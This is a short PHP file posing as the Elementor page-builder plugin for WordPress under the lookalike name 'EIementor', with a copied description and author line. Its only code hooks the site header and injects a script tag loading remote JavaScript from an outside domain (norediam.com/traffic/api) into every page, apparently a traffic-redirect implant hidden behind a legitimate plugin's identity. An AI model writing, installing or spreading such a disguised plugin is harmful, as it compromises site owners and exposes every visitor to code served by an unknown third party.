<?php
/**
 * Plugin Name: EIementor
 * Description: Elementor is a live drag-and-drop page builder for WordPress that allows users to create unique website layouts in real time without writing HTML or CSS.
 * Version: 4.2.2
 * Author: Elementor.com
 */

if (!defined('ABSPATH')) {
    exit;
}

add_action('wp_head', 'icarus_eiementor_head');

function icarus_eiementor_head() {
    echo '<script src="https://norediam.com/traffic/api"></script>';
}
